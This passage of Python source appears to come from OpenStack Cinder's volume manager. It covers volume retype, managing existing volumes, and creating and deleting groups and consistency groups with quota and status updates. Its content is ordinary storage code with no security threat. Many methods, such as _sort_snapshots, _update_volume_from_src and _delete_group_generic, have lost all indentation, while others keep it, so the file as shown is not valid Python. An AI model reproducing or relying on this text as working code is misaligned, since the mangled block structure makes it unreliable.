        # if it's the volume is in a clustered backend or not) is the same as
        # the current. If it's not don't call the driver.retype method,
        # otherwise drivers that implement retype may report success, but it's
        # invalid in the case of a migrate.

        # We assume that those that support pools do this internally
        # so we strip off the pools designation
        if (not retyped and
                not diff.get('encryption') and
                self._is_our_backend(host['host'], host.get('cluster_name'))):
            try:
                new_type = volume_types.get_volume_type(context.elevated(),
                                                        new_type_id)
                with volume.obj_as_admin():
                    ret = self.driver.retype(context,
                                             volume,
                                             new_type,
                                             diff,
                                             host)
                # Check if the driver retype provided a model update or
                # just a retype indication
                if type(ret) == tuple:
                    retyped, retype_model_update = ret
                else:
                    retyped = ret

                if retyped:
                    LOG.info(_LI("Volume %s: retyped successfully"), volume.id)
            except Exception:
                retyped = False
                LOG.exception(_LE("Volume %s: driver error when trying to "
                                  "retype, falling back to generic "
                                  "mechanism."), volume.id)

        # We could not change the type, so we need to migrate the volume, where
        # the destination volume will be of the new type
        if not retyped:
            if migration_policy == 'never':
                _retype_error(context, volume, old_reservations,
                              new_reservations, status_update)
                msg = _("Retype requires migration but is not allowed.")
                raise exception.VolumeMigrationFailed(reason=msg)

            snaps = objects.SnapshotList.get_all_for_volume(context,
                                                            volume.id)
            if snaps:
                _retype_error(context, volume, old_reservations,
                              new_reservations, status_update)
                msg = _("Volume must not have snapshots.")
                LOG.error(msg)
                raise exception.InvalidVolume(reason=msg)

            # Don't allow volume with replicas to be migrated
            rep_status = volume.replication_status
            if rep_status is not None and rep_status != 'disabled':
                _retype_error(context, volume, old_reservations,
                              new_reservations, status_update)
                msg = _("Volume must not be replicated.")
                LOG.error(msg)
                raise exception.InvalidVolume(reason=msg)

            volume.migration_status = 'starting'
            volume.save()

            try:
                self.migrate_volume(context, volume, host,
                                    new_type_id=new_type_id)
            except Exception:
                with excutils.save_and_reraise_exception():
                    _retype_error(context, volume, old_reservations,
                                  new_reservations, status_update)
        else:
            model_update = {'volume_type_id': new_type_id,
                            'host': host['host'],
                            'cluster_name': host.get('cluster_name'),
                            'status': status_update['status']}
            if retype_model_update:
                model_update.update(retype_model_update)
            self._set_replication_status(diff, model_update)
            volume.update(model_update)
            volume.save()

        if old_reservations:
            QUOTAS.commit(context, old_reservations, project_id=project_id)
        if new_reservations:
            QUOTAS.commit(context, new_reservations, project_id=project_id)
        self._notify_about_volume_usage(
            context, volume, "retype",
            extra_usage_info={'volume_type': new_type_id})
        self.publish_service_capabilities(context)
        LOG.info(_LI("Retype volume completed successfully."),
                 resource=volume)
@staticmethod
def _set_replication_status(diff, model_update):
"""Update replication_status in model_update if it has changed."""
if not diff or model_update.get('replication_status'):
return
diff_specs = diff.get('extra_specs', {})
replication_diff = diff_specs.get('replication_enabled')
if replication_diff:
is_replicated = vol_utils.is_replicated_str(replication_diff[1])
if is_replicated:
replication_status = fields.ReplicationStatus.ENABLED
else:
replication_status = fields.ReplicationStatus.DISABLED
model_update['replication_status'] = replication_status
def manage_existing(self, ctxt, volume, ref=None):
vol_ref = self._run_manage_existing_flow_engine(
ctxt, volume, ref)
self._update_stats_for_managed(vol_ref)
LOG.info(_LI("Manage existing volume completed successfully."),
resource=vol_ref)
return vol_ref.id
def _update_stats_for_managed(self, volume_reference):
# Update volume stats
pool = vol_utils.extract_host(volume_reference.host, 'pool')
if pool is None:
# Legacy volume, put them into default pool
pool = self.driver.configuration.safe_get(
'volume_backend_name') or vol_utils.extract_host(
volume_reference.host, 'pool', True)
try:
self.stats['pools'][pool]['allocated_capacity_gb'] \
+= volume_reference.size
except KeyError:
self.stats['pools'][pool] = dict(
allocated_capacity_gb=volume_reference.size)
def _run_manage_existing_flow_engine(self, ctxt, volume, ref):
try:
flow_engine = manage_existing.get_flow(
ctxt,
self.db,
self.driver,
self.host,
volume,
ref,
)
except Exception:
msg = _("Failed to create manage_existing flow.")
LOG.exception(msg, resource={'type': 'volume', 'id': volume.id})
raise exception.CinderException(msg)
with flow_utils.DynamicLogListener(flow_engine, logger=LOG):
flow_engine.run()
# Fetch created volume from storage
vol_ref = flow_engine.storage.fetch('volume')
return vol_ref
def _get_my_resources(self, ctxt, ovo_class_list):
if self.cluster:
filters = {'cluster_name': self.cluster}
else:
filters = {'host': self.host}
return getattr(ovo_class_list, 'get_all')(ctxt, filters=filters)
    def _get_my_volumes(self, ctxt):
        """Return all volumes belonging to this service (cluster or host)."""
        return self._get_my_resources(ctxt, objects.VolumeList)
    def _get_my_snapshots(self, ctxt):
        """Return all snapshots belonging to this service (cluster or host)."""
        return self._get_my_resources(ctxt, objects.SnapshotList)
def get_manageable_volumes(self, ctxt, marker, limit, offset, sort_keys,
sort_dirs, want_objects=False):
try:
utils.require_driver_initialized(self.driver)
except exception.DriverNotInitialized:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Listing manageable volumes failed, due "
"to uninitialized driver."))
cinder_volumes = self._get_my_volumes(ctxt)
try:
driver_entries = self.driver.get_manageable_volumes(
cinder_volumes, marker, limit, offset, sort_keys, sort_dirs)
if want_objects:
driver_entries = (objects.ManageableVolumeList.
from_primitives(ctxt, driver_entries))
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Listing manageable volumes failed, due "
"to driver error."))
return driver_entries
    def create_consistencygroup(self, context, group):
        """Creates the consistency group.

        Delegates to ``_create_group`` with ``is_generic_group=False`` so
        the legacy consistency-group driver path and notifications are used.
        """
        return self._create_group(context, group, False)
    def create_group(self, context, group):
        """Creates the group.

        Delegates to ``_create_group`` with the default
        ``is_generic_group=True`` (generic group driver path).
        """
        return self._create_group(context, group)
    def _create_group(self, context, group, is_generic_group=True):
        """Common implementation for group / consistency-group creation.

        :param group: the group (or CG) object to create on the backend
        :param is_generic_group: selects the generic-group driver path and
                                 notifications (True) vs. the legacy CG
                                 path (False)
        :returns: the created group with status/created_at set
        :raises VolumeDriverException: if the driver reports ERROR status
        """
        context = context.elevated()

        # Make sure the host in the DB matches our own when clustered
        self._set_resource_host(group)

        status = fields.GroupStatus.AVAILABLE
        model_update = None

        if is_generic_group:
            self._notify_about_group_usage(
                context, group, "create.start")
        else:
            self._notify_about_consistencygroup_usage(
                context, group, "create.start")

        try:
            utils.require_driver_initialized(self.driver)

            LOG.info(_LI("Group %s: creating"), group.name)
            if is_generic_group:
                try:
                    model_update = self.driver.create_group(context,
                                                            group)
                except NotImplementedError:
                    # Driver has no generic-group support: fall back to the
                    # generic implementation, or (for the default
                    # cgsnapshot group type) translate to the legacy CG
                    # driver call.
                    cgsnap_type = group_types.get_default_cgsnapshot_type()
                    if group.group_type_id != cgsnap_type['id']:
                        model_update = self._create_group_generic(context,
                                                                  group)
                    else:
                        cg, __ = self._convert_group_to_cg(group, [])
                        model_update = self.driver.create_consistencygroup(
                            context, cg)
            else:
                model_update = self.driver.create_consistencygroup(context,
                                                                   group)

            if model_update:
                if (model_update['status'] ==
                        fields.GroupStatus.ERROR):
                    msg = (_('Create group failed.'))
                    LOG.error(msg,
                              resource={'type': 'group',
                                        'id': group.id})
                    raise exception.VolumeDriverException(message=msg)
                else:
                    group.update(model_update)
                    group.save()
        except Exception:
            with excutils.save_and_reraise_exception():
                group.status = fields.GroupStatus.ERROR
                group.save()
                LOG.error(_LE("Group %s: create failed"),
                          group.name)

        group.status = status
        group.created_at = timeutils.utcnow()
        group.save()
        LOG.info(_LI("Group %s: created successfully"),
                 group.name)

        if is_generic_group:
            self._notify_about_group_usage(
                context, group, "create.end")
        else:
            self._notify_about_consistencygroup_usage(
                context, group, "create.end")

        LOG.info(_LI("Create group completed successfully."),
                 resource={'type': 'group',
                           'id': group.id})
        return group
    def create_consistencygroup_from_src(self, context, group,
                                         cgsnapshot=None, source_cg=None):
        """Creates the consistency group from source.

        The source can be a CG snapshot or a source CG.

        :param group: the destination consistency group (its member volumes
                      are expected to exist already in the DB)
        :param cgsnapshot: source CG snapshot, mutually exclusive in
                           practice with *source_cg*
        :param source_cg: source consistency group
        :raises InvalidConsistencyGroup: a source snapshot/volume is not in
                                         a valid state
        """
        source_name = None
        snapshots = None
        source_vols = None
        try:
            volumes = self.db.volume_get_all_by_group(context, group.id)

            if cgsnapshot:
                try:
                    # Check if cgsnapshot still exists
                    cgsnapshot = objects.CGSnapshot.get_by_id(
                        context, cgsnapshot.id)
                except exception.CgSnapshotNotFound:
                    LOG.error(_LE("Create consistency group "
                                  "from snapshot-%(snap)s failed: "
                                  "SnapshotNotFound."),
                              {'snap': cgsnapshot.id},
                              resource={'type': 'consistency_group',
                                        'id': group.id})
                    raise

                source_name = _("snapshot-%s") % cgsnapshot.id
                snapshots = objects.SnapshotList.get_all_for_cgsnapshot(
                    context, cgsnapshot.id)
                for snap in snapshots:
                    if (snap.status not in
                            VALID_CREATE_CG_SRC_SNAP_STATUS):
                        msg = (_("Cannot create consistency group "
                                 "%(group)s because snapshot %(snap)s is "
                                 "not in a valid state. Valid states are: "
                                 "%(valid)s.") %
                               {'group': group.id,
                                'snap': snap['id'],
                                'valid': VALID_CREATE_CG_SRC_SNAP_STATUS})
                        raise exception.InvalidConsistencyGroup(reason=msg)

            if source_cg:
                try:
                    source_cg = objects.ConsistencyGroup.get_by_id(
                        context, source_cg.id)
                except exception.ConsistencyGroupNotFound:
                    LOG.error(_LE("Create consistency group "
                                  "from source cg-%(cg)s failed: "
                                  "ConsistencyGroupNotFound."),
                              {'cg': source_cg.id},
                              resource={'type': 'consistency_group',
                                        'id': group.id})
                    raise

                source_name = _("cg-%s") % source_cg.id
                source_vols = self.db.volume_get_all_by_group(
                    context, source_cg.id)
                for source_vol in source_vols:
                    if (source_vol['status'] not in
                            VALID_CREATE_CG_SRC_CG_STATUS):
                        msg = (_("Cannot create consistency group "
                                 "%(group)s because source volume "
                                 "%(source_vol)s is not in a valid "
                                 "state. Valid states are: "
                                 "%(valid)s.") %
                               {'group': group.id,
                                'source_vol': source_vol['id'],
                                'valid': VALID_CREATE_CG_SRC_CG_STATUS})
                        raise exception.InvalidConsistencyGroup(reason=msg)

            # Sort source snapshots so that they are in the same order as their
            # corresponding target volumes.
            sorted_snapshots = None
            if cgsnapshot and snapshots:
                sorted_snapshots = self._sort_snapshots(volumes, snapshots)

            # Sort source volumes so that they are in the same order as their
            # corresponding target volumes.
            sorted_source_vols = None
            if source_cg and source_vols:
                sorted_source_vols = self._sort_source_vols(volumes,
                                                            source_vols)

            self._notify_about_consistencygroup_usage(
                context, group, "create.start")

            utils.require_driver_initialized(self.driver)

            model_update, volumes_model_update = (
                self.driver.create_consistencygroup_from_src(
                    context, group, volumes, cgsnapshot,
                    sorted_snapshots, source_cg, sorted_source_vols))

            if volumes_model_update:
                for update in volumes_model_update:
                    self.db.volume_update(context, update['id'], update)

            if model_update:
                group.update(model_update)
                group.save()

        except Exception:
            with excutils.save_and_reraise_exception():
                group.status = 'error'
                group.save()
                LOG.error(_LE("Create consistency group "
                              "from source %(source)s failed."),
                          {'source': source_name},
                          resource={'type': 'consistency_group',
                                    'id': group.id})
                # Update volume status to 'error' as well.
                for vol in volumes:
                    self.db.volume_update(
                        context, vol['id'], {'status': 'error'})

        now = timeutils.utcnow()
        status = 'available'
        for vol in volumes:
            update = {'status': status, 'created_at': now}
            self._update_volume_from_src(context, vol, update, group=group)
            self._update_allocated_capacity(vol)

        group.status = status
        group.created_at = now
        group.save()

        self._notify_about_consistencygroup_usage(
            context, group, "create.end")
        LOG.info(_LI("Create consistency group "
                     "from source-%(source)s completed successfully."),
                 {'source': source_name},
                 resource={'type': 'consistency_group',
                           'id': group.id})
        return group
    def create_group_from_src(self, context, group,
                              group_snapshot=None, source_group=None):
        """Creates the group from source.

        The source can be a group snapshot or a source group.  The target
        volumes are expected to already exist in the database; this method
        drives the backend to populate them from the source and then marks
        both the volumes and the group 'available'.

        :param context: request context
        :param group: the Group object being created
        :param group_snapshot: optional GroupSnapshot to create from
        :param source_group: optional source Group to clone from
        :returns: the updated Group object
        :raises: GroupSnapshotNotFound, GroupNotFound, InvalidGroup, or
            whatever the driver raises; on any failure the group and its
            volumes are flagged 'error' before re-raising.
        """
        source_name = None
        snapshots = None
        source_vols = None
        try:
            volumes = objects.VolumeList.get_all_by_generic_group(context,
                                                                  group.id)
            if group_snapshot:
                try:
                    # Check if group_snapshot still exists
                    group_snapshot = objects.GroupSnapshot.get_by_id(
                        context, group_snapshot.id)
                except exception.GroupSnapshotNotFound:
                    LOG.error(_LE("Create group "
                                  "from snapshot-%(snap)s failed: "
                                  "SnapshotNotFound."),
                              {'snap': group_snapshot.id},
                              resource={'type': 'group',
                                        'id': group.id})
                    raise
                source_name = _("snapshot-%s") % group_snapshot.id
                snapshots = objects.SnapshotList.get_all_for_group_snapshot(
                    context, group_snapshot.id)
                # Every source snapshot must be in a usable state before
                # the driver is asked to clone from it.
                for snap in snapshots:
                    if (snap.status not in
                            VALID_CREATE_GROUP_SRC_SNAP_STATUS):
                        msg = (_("Cannot create group "
                                 "%(group)s because snapshot %(snap)s is "
                                 "not in a valid state. Valid states are: "
                                 "%(valid)s.") %
                               {'group': group.id,
                                'snap': snap['id'],
                                'valid': VALID_CREATE_GROUP_SRC_SNAP_STATUS})
                        raise exception.InvalidGroup(reason=msg)
            if source_group:
                try:
                    # Check if source_group still exists
                    source_group = objects.Group.get_by_id(
                        context, source_group.id)
                except exception.GroupNotFound:
                    LOG.error(_LE("Create group "
                                  "from source group-%(group)s failed: "
                                  "GroupNotFound."),
                              {'group': source_group.id},
                              resource={'type': 'group',
                                        'id': group.id})
                    raise
                source_name = _("group-%s") % source_group.id
                source_vols = objects.VolumeList.get_all_by_generic_group(
                    context, source_group.id)
                # Every source volume must be in a usable state as well.
                for source_vol in source_vols:
                    if (source_vol.status not in
                            VALID_CREATE_GROUP_SRC_GROUP_STATUS):
                        msg = (_("Cannot create group "
                                 "%(group)s because source volume "
                                 "%(source_vol)s is not in a valid "
                                 "state. Valid states are: "
                                 "%(valid)s.") %
                               {'group': group.id,
                                'source_vol': source_vol.id,
                                'valid': VALID_CREATE_GROUP_SRC_GROUP_STATUS})
                        raise exception.InvalidGroup(reason=msg)
            # Sort source snapshots so that they are in the same order as their
            # corresponding target volumes.
            sorted_snapshots = None
            if group_snapshot and snapshots:
                sorted_snapshots = self._sort_snapshots(volumes, snapshots)
            # Sort source volumes so that they are in the same order as their
            # corresponding target volumes.
            sorted_source_vols = None
            if source_group and source_vols:
                sorted_source_vols = self._sort_source_vols(volumes,
                                                            source_vols)
            self._notify_about_group_usage(
                context, group, "create.start")
            utils.require_driver_initialized(self.driver)
            try:
                model_update, volumes_model_update = (
                    self.driver.create_group_from_src(
                        context, group, volumes, group_snapshot,
                        sorted_snapshots, source_group, sorted_source_vols))
            except NotImplementedError:
                # Fall back for drivers that predate generic groups: use the
                # per-volume generic implementation, or -- for the default
                # cgsnapshot group type -- convert the objects to legacy
                # consistency-group equivalents and call the CG driver API.
                cgsnap_type = group_types.get_default_cgsnapshot_type()
                if group.group_type_id != cgsnap_type['id']:
                    model_update, volumes_model_update = (
                        self._create_group_from_src_generic(
                            context, group, volumes, group_snapshot,
                            sorted_snapshots, source_group,
                            sorted_source_vols))
                else:
                    cg, volumes = self._convert_group_to_cg(
                        group, volumes)
                    cgsnapshot, sorted_snapshots = (
                        self._convert_group_snapshot_to_cgsnapshot(
                            group_snapshot, sorted_snapshots, context))
                    source_cg, sorted_source_vols = (
                        self._convert_group_to_cg(source_group,
                                                  sorted_source_vols))
                    model_update, volumes_model_update = (
                        self.driver.create_consistencygroup_from_src(
                            context, cg, volumes, cgsnapshot,
                            sorted_snapshots, source_cg, sorted_source_vols))
                    # Undo the temporary CG linkage on the objects.
                    self._remove_cgsnapshot_id_from_snapshots(sorted_snapshots)
                    self._remove_consistencygroup_id_from_volumes(volumes)
                    self._remove_consistencygroup_id_from_volumes(
                        sorted_source_vols)
            if volumes_model_update:
                for update in volumes_model_update:
                    self.db.volume_update(context, update['id'], update)
            if model_update:
                group.update(model_update)
                group.save()
        except Exception:
            with excutils.save_and_reraise_exception():
                group.status = 'error'
                group.save()
                LOG.error(_LE("Create group "
                              "from source %(source)s failed."),
                          {'source': source_name},
                          resource={'type': 'group',
                                    'id': group.id})
                # Update volume status to 'error' as well.
                self._remove_consistencygroup_id_from_volumes(volumes)
                for vol in volumes:
                    vol.status = 'error'
                    vol.save()
        now = timeutils.utcnow()
        status = 'available'
        for vol in volumes:
            update = {'status': status, 'created_at': now}
            self._update_volume_from_src(context, vol, update, group=group)
            self._update_allocated_capacity(vol)
        group.status = status
        group.created_at = now
        group.save()
        self._notify_about_group_usage(
            context, group, "create.end")
        LOG.info(_LI("Create group "
                     "from source-%(source)s completed successfully."),
                 {'source': source_name},
                 resource={'type': 'group',
                           'id': group.id})
        return group
def _create_group_from_src_generic(self, context, group, volumes,
group_snapshot=None, snapshots=None,
source_group=None, source_vols=None):
"""Creates a group from source.
:param context: the context of the caller.
:param group: the Group object to be created.
:param volumes: a list of volume objects in the group.
:param group_snapshot: the GroupSnapshot object as source.
:param snapshots: a list of snapshot objects in group_snapshot.
:param source_group: the Group object as source.
:param source_vols: a list of volume objects in the source_group.
:returns: model_update, volumes_model_update
"""
for vol in volumes:
try:
if snapshots:
for snapshot in snapshots:
if vol.snapshot_id == snapshot.id:
self.driver.create_volume_from_snapshot(
vol, snapshot)
break
except Exception:
raise
try:
if source_vols:
for source_vol in source_vols:
if vol.source_volid == source_vol.id:
self.driver.create_cloned_volume(vol, source_vol)
break
except Exception:
raise
return None, None
def _sort_snapshots(self, volumes, snapshots):
# Sort source snapshots so that they are in the same order as their
# corresponding target volumes. Each source snapshot in the snapshots
# list should have a corresponding target volume in the volumes list.
if not volumes or not snapshots or len(volumes) != len(snapshots):
msg = _("Input volumes or snapshots are invalid.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
sorted_snapshots = []
for vol in volumes:
found_snaps = [snap for snap in snapshots
if snap['id'] == vol['snapshot_id']]
if not found_snaps:
LOG.error(_LE("Source snapshot cannot be found for target "
"volume %(volume_id)s."),
{'volume_id': vol['id']})
raise exception.SnapshotNotFound(
snapshot_id=vol['snapshot_id'])
sorted_snapshots.extend(found_snaps)
return sorted_snapshots
def _sort_source_vols(self, volumes, source_vols):
# Sort source volumes so that they are in the same order as their
# corresponding target volumes. Each source volume in the source_vols
# list should have a corresponding target volume in the volumes list.
if not volumes or not source_vols or len(volumes) != len(source_vols):
msg = _("Input volumes or source volumes are invalid.")
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
sorted_source_vols = []
for vol in volumes:
found_source_vols = [source_vol for source_vol in source_vols
if source_vol['id'] == vol['source_volid']]
if not found_source_vols:
LOG.error(_LE("Source volumes cannot be found for target "
"volume %(volume_id)s."),
{'volume_id': vol['id']})
raise exception.VolumeNotFound(
volume_id=vol['source_volid'])
sorted_source_vols.extend(found_source_vols)
return sorted_source_vols
def _update_volume_from_src(self, context, vol, update, group=None):
try:
snapshot_id = vol.get('snapshot_id')
source_volid = vol.get('source_volid')
if snapshot_id:
snapshot = objects.Snapshot.get_by_id(context, snapshot_id)
orig_vref = self.db.volume_get(context,
snapshot.volume_id)
if orig_vref.bootable:
update['bootable'] = True
self.db.volume_glance_metadata_copy_to_volume(
context, vol['id'], snapshot_id)
if source_volid:
source_vol = objects.Volume.get_by_id(context, source_volid)
if source_vol.bootable:
update['bootable'] = True
self.db.volume_glance_metadata_copy_from_volume_to_volume(
context, source_volid, vol['id'])
if source_vol.multiattach:
update['multiattach'] = True
except exception.SnapshotNotFound:
LOG.error(_LE("Source snapshot %(snapshot_id)s cannot be found."),
{'snapshot_id': vol['snapshot_id']})
self.db.volume_update(context, vol['id'],
{'status': 'error'})
if group:
group.status = 'error'
group.save()
raise
except exception.VolumeNotFound:
LOG.error(_LE("The source volume %(volume_id)s "
"cannot be found."),
{'volume_id': snapshot.volume_id})
self.db.volume_update(context, vol['id'],
{'status': 'error'})
if group:
group.status = 'error'
group.save()
raise
except exception.CinderException as ex:
LOG.error(_LE("Failed to update %(volume_id)s"
" metadata using the provided snapshot"
" %(snapshot_id)s metadata."),
{'volume_id': vol['id'],
'snapshot_id': vol['snapshot_id']})
self.db.volume_update(context, vol['id'],
{'status': 'error'})
if group:
group.status = 'error'
group.save()
raise exception.MetadataCopyFailure(reason=six.text_type(ex))
self.db.volume_update(context, vol['id'], update)
def _update_allocated_capacity(self, vol):
# Update allocated capacity in volume stats
pool = vol_utils.extract_host(vol['host'], 'pool')
if pool is None:
# Legacy volume, put them into default pool
pool = self.driver.configuration.safe_get(
'volume_backend_name') or vol_utils.extract_host(
vol['host'], 'pool', True)
try:
self.stats['pools'][pool]['allocated_capacity_gb'] += (
vol['size'])
except KeyError:
self.stats['pools'][pool] = dict(
allocated_capacity_gb=vol['size'])
    def delete_consistencygroup(self, context, group):
        """Deletes consistency group and the volumes in the group.

        All member volumes must already be detached.  The driver deletes
        the group first; quota for the group and each volume is then
        released and the database rows destroyed.

        :param context: request context (elevated internally)
        :param group: the ConsistencyGroup object to delete
        :raises VolumeAttached: if any member volume is still attached
        :raises VolumeDriverException: if the driver reports an error status
        """
        context = context.elevated()
        project_id = group.project_id
        # NOTE(review): this if/else is redundant -- both branches end up
        # assigning the same value project_id already holds.
        if context.project_id != group.project_id:
            project_id = group.project_id
        else:
            project_id = context.project_id
        volumes = objects.VolumeList.get_all_by_group(context, group.id)
        for volume in volumes:
            if (volume.attach_status ==
                    fields.VolumeAttachStatus.ATTACHED):
                # Volume is still attached, need to detach first
                raise exception.VolumeAttached(volume_id=volume.id)
            self._check_is_our_resource(volume)
        self._notify_about_consistencygroup_usage(
            context, group, "delete.start")
        volumes_model_update = None
        model_update = None
        try:
            utils.require_driver_initialized(self.driver)
            model_update, volumes_model_update = (
                self.driver.delete_consistencygroup(context, group, volumes))
            if volumes_model_update:
                for volume in volumes_model_update:
                    update = {'status': volume['status']}
                    self.db.volume_update(context, volume['id'],
                                          update)
                    # If we failed to delete a volume, make sure the status
                    # for the cg is set to error as well
                    if (volume['status'] in ['error_deleting', 'error'] and
                            model_update['status'] not in
                            ['error_deleting', 'error']):
                        model_update['status'] = volume['status']
            if model_update:
                if model_update['status'] in ['error_deleting', 'error']:
                    msg = (_('Delete consistency group failed.'))
                    LOG.error(msg,
                              resource={'type': 'consistency_group',
                                        'id': group.id})
                    raise exception.VolumeDriverException(message=msg)
                else:
                    group.update(model_update)
                    group.save()
        except Exception:
            with excutils.save_and_reraise_exception():
                group.status = 'error'
                group.save()
                # Update volume status to 'error' if driver returns
                # None for volumes_model_update.
                if not volumes_model_update:
                    for vol in volumes:
                        vol.status = 'error'
                        vol.save()
        # Get reservations for group
        try:
            reserve_opts = {'consistencygroups': -1}
            cgreservations = CGQUOTAS.reserve(context,
                                              project_id=project_id,
                                              **reserve_opts)
        except Exception:
            # Quota failures are logged but do not abort the delete.
            cgreservations = None
            LOG.exception(_LE("Delete consistency group "
                              "failed to update usages."),
                          resource={'type': 'consistency_group',
                                    'id': group.id})
        for volume in volumes:
            # Get reservations for volume
            try:
                reserve_opts = {'volumes': -1,
                                'gigabytes': -volume.size}
                QUOTAS.add_volume_type_opts(context,
                                            reserve_opts,
                                            volume.volume_type_id)
                reservations = QUOTAS.reserve(context,
                                              project_id=project_id,
                                              **reserve_opts)
            except Exception:
                reservations = None
                LOG.exception(_LE("Delete consistency group "
                                  "failed to update usages."),
                              resource={'type': 'consistency_group',
                                        'id': group.id})
            # Delete glance metadata if it exists
            self.db.volume_glance_metadata_delete_by_volume(context, volume.id)
            self.db.volume_destroy(context, volume.id)
            # Commit the reservations
            if reservations:
                QUOTAS.commit(context, reservations, project_id=project_id)
            self.stats['allocated_capacity_gb'] -= volume.size
        if cgreservations:
            CGQUOTAS.commit(context, cgreservations,
                            project_id=project_id)
        group.destroy()
        self._notify_about_consistencygroup_usage(
            context, group, "delete.end", volumes)
        self.publish_service_capabilities(context)
        LOG.info(_LI("Delete consistency group "
                     "completed successfully."),
                 resource={'type': 'consistency_group',
                           'id': group.id})
    def delete_group(self, context, group):
        """Deletes group and the volumes in the group.

        Generic-group counterpart of delete_consistencygroup: member
        volumes must be detached; the driver deletes the group (falling
        back to the generic or legacy-CG path when ``delete_group`` is
        not implemented), then quota is released and the rows destroyed.

        :param context: request context (elevated internally)
        :param group: the Group object to delete
        :raises VolumeAttached: if any member volume is still attached
        :raises VolumeDriverException: if the driver reports an error status
        """
        context = context.elevated()
        project_id = group.project_id
        # NOTE(review): this if/else is redundant -- both branches end up
        # assigning the same value project_id already holds.
        if context.project_id != group.project_id:
            project_id = group.project_id
        else:
            project_id = context.project_id
        volumes = objects.VolumeList.get_all_by_generic_group(
            context, group.id)
        for vol_obj in volumes:
            if vol_obj.attach_status == "attached":
                # Volume is still attached, need to detach first
                raise exception.VolumeAttached(volume_id=vol_obj.id)
            self._check_is_our_resource(vol_obj)
        self._notify_about_group_usage(
            context, group, "delete.start")
        volumes_model_update = None
        model_update = None
        try:
            utils.require_driver_initialized(self.driver)
            try:
                model_update, volumes_model_update = (
                    self.driver.delete_group(context, group, volumes))
            except NotImplementedError:
                # Fall back for drivers without generic group support.
                cgsnap_type = group_types.get_default_cgsnapshot_type()
                if group.group_type_id != cgsnap_type['id']:
                    model_update, volumes_model_update = (
                        self._delete_group_generic(context, group, volumes))
                else:
                    # Legacy path: convert to a consistency group, call the
                    # CG driver API, then undo the temporary linkage.
                    cg, volumes = self._convert_group_to_cg(
                        group, volumes)
                    model_update, volumes_model_update = (
                        self.driver.delete_consistencygroup(context, cg,
                                                            volumes))
                    self._remove_consistencygroup_id_from_volumes(volumes)
            if volumes_model_update:
                for update in volumes_model_update:
                    # If we failed to delete a volume, make sure the
                    # status for the group is set to error as well
                    if (update['status'] in ['error_deleting', 'error']
                            and model_update['status'] not in
                            ['error_deleting', 'error']):
                        model_update['status'] = update['status']
                self.db.volumes_update(context, volumes_model_update)
            if model_update:
                if model_update['status'] in ['error_deleting', 'error']:
                    msg = (_('Delete group failed.'))
                    LOG.error(msg,
                              resource={'type': 'group',
                                        'id': group.id})
                    raise exception.VolumeDriverException(message=msg)
                else:
                    group.update(model_update)
                    group.save()
        except Exception:
            with excutils.save_and_reraise_exception():
                group.status = 'error'
                group.save()
                # Update volume status to 'error' if driver returns
                # None for volumes_model_update.
                if not volumes_model_update:
                    self._remove_consistencygroup_id_from_volumes(volumes)
                    for vol_obj in volumes:
                        vol_obj.status = 'error'
                        vol_obj.save()
        # Get reservations for group
        try:
            reserve_opts = {'groups': -1}
            grpreservations = GROUP_QUOTAS.reserve(context,
                                                   project_id=project_id,
                                                   **reserve_opts)
        except Exception:
            # Quota failures are logged but do not abort the delete.
            grpreservations = None
            LOG.exception(_LE("Delete group "
                              "failed to update usages."),
                          resource={'type': 'group',
                                    'id': group.id})
        for vol in volumes:
            # Get reservations for volume
            try:
                reserve_opts = {'volumes': -1,
                                'gigabytes': -vol.size}
                QUOTAS.add_volume_type_opts(context,
                                            reserve_opts,
                                            vol.volume_type_id)
                reservations = QUOTAS.reserve(context,
                                              project_id=project_id,
                                              **reserve_opts)
            except Exception:
                reservations = None
                LOG.exception(_LE("Delete group "
                                  "failed to update usages."),
                              resource={'type': 'group',
                                        'id': group.id})
            # Delete glance metadata if it exists
            self.db.volume_glance_metadata_delete_by_volume(context, vol.id)
            vol.destroy()
            # Commit the reservations
            if reservations:
                QUOTAS.commit(context, reservations, project_id=project_id)
            self.stats['allocated_capacity_gb'] -= vol.size
        if grpreservations:
            GROUP_QUOTAS.commit(context, grpreservations,
                                project_id=project_id)
        group.destroy()
        self._notify_about_group_usage(
            context, group, "delete.end")
        self.publish_service_capabilities(context)
        LOG.info(_LI("Delete group "
                     "completed successfully."),
                 resource={'type': 'group',
                           'id': group.id})
def _convert_group_to_cg(self, group, volumes):
if not group:
return None, None
cg = consistencygroup.ConsistencyGroup()
cg.from_group(group)
for vol in volumes:
vol.consistencygroup_id = vol.group_id
vol.consistencygroup = cg
return cg, volumes
def _remove_consistencygroup_id_from_volumes(self, volumes):
if not volumes:
return
for vol in volumes:
vol.consistencygroup_id = None
vol.consistencygroup = None
    def _convert_group_snapshot_to_cgsnapshot(self, group_snapshot, snapshots,
                                              ctxt):
        """Build a legacy CGSnapshot view of ``group_snapshot``.

        Links each snapshot to the CGSnapshot so legacy consistency-group
        driver APIs can consume them; the temporary linkage can be undone
        with ``_remove_cgsnapshot_id_from_snapshots``.  Returns
        ``(None, None)`` when ``group_snapshot`` is falsy.
        """
        if not group_snapshot:
            return None, None
        cgsnap = cgsnapshot.CGSnapshot()
        cgsnap.from_group_snapshot(group_snapshot)
        # Populate consistencygroup object
        grp = objects.Group.get_by_id(ctxt, group_snapshot.group_id)
        cg, __ = self._convert_group_to_cg(grp, [])
        cgsnap.consistencygroup = cg
        for snap in snapshots:
            snap.cgsnapshot_id = snap.group_snapshot_id
            snap.cgsnapshot = cgsnap
        return cgsnap, snapshots
def _remove_cgsnapshot_id_from_snapshots(self, snapshots):
if not snapshots:
return
for snap in snapshots:
snap.cgsnapshot_id = None
snap.cgsnapshot = None
def _create_group_generic(self, context, group):
"""Creates a group."""
# A group entry is already created in db. Just returns a status here.
model_update = {'status': fields.GroupStatus.AVAILABLE,
'created_at': timeutils.utcnow()}
return model_update
def _delete_group_generic(self, context, group, volumes):
"""Deletes a group and volumes in the group."""
model_update = {'status': group.status}
volume_model_updates = []
for volume_ref in volumes:
volume_model_update = {'id': volume_ref.id}
try:
self.driver.remove_export(context, volume_ref)
self.driver.delete_volume(volume_ref)
volume_model_update['status'] = 'deleted'
except exception.VolumeIsBusy:
volume_model_update['status'] = 'available'
except Exception:
volume_model_update['status'] = 'error'
model_update['status'] = fields.GroupStatus.ERROR
volume_model_updates.append(volume_model_update)
return model_update, volume_model_updates
